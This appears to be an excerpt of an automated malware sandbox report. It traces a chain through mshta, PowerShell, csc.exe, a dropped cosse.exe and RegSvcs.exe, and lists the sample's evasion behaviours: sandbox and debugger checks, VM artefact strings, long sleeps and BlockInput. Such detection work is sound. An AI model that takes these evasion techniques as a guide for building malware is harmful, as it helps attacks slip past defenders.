                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cosse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cosse.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\AppData\Roaming\cosse.exeAPI/Special instruction interceptor: Address: B83534
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: cosse.exe, 00000006.00000003.956691851.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, cosse.exe, 00000006.00000003.953662228.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, cosse.exe, 00000006.00000003.957038854.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, cosse.exe, 00000006.00000003.954163202.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, cosse.exe, 00000006.00000002.969079182.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, cosse.exe, 00000006.00000003.957131528.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, cosse.exe, 00000006.00000003.953733576.0000000000BBA000.00000004.00000020.00020000.00000000.sdmp, cosse.exe, 00000006.00000003.956333213.0000000000BBA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXERU[_%
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeWindow / User API: threadDelayed 7396Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7143Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2526Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\cosse.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_6-100883
                    Source: C:\Users\user\AppData\Roaming\cosse.exeAPI coverage: 4.8 %
                    Source: C:\Windows\SysWOW64\mshta.exe TID: 6624Thread sleep count: 7396 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6088Thread sleep count: 7143 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6548Thread sleep count: 2526 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6336Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 3136Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0016445A GetFileAttributesW,FindFirstFileW,FindClose,6_2_0016445A
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0016C6D1 FindFirstFileW,FindClose,6_2_0016C6D1
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0016C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_0016C75C
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_0016F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_0016F3F3
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_001637EF
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00163B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00163B12
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_001049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_001049A0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: powershell.exe, 00000003.00000002.975652053.00000000051A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.983878644.0000000007A2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PhGfs
                    Source: powershell.exe, 00000003.00000002.975652053.00000000051A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: svchost.exe, 00000009.00000002.2093308981.0000024D6042B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                    Source: powershell.exe, 00000003.00000002.985580139.0000000008925000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.985580139.000000000889D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2095307065.0000024D65A59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: powershell.exe, 00000003.00000002.986083434.0000000008942000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                    Source: RegSvcs.exe, 00000007.00000002.2092334549.0000000000698000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltens
                    Source: powershell.exe, 00000003.00000002.975652053.00000000051A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_008EC168 LdrInitializeThunk,LdrInitializeThunk,7_2_008EC168
                    Source: C:\Users\user\AppData\Roaming\cosse.exeCode function: 6_2_00173F09 BlockInput,6_2_00173F09
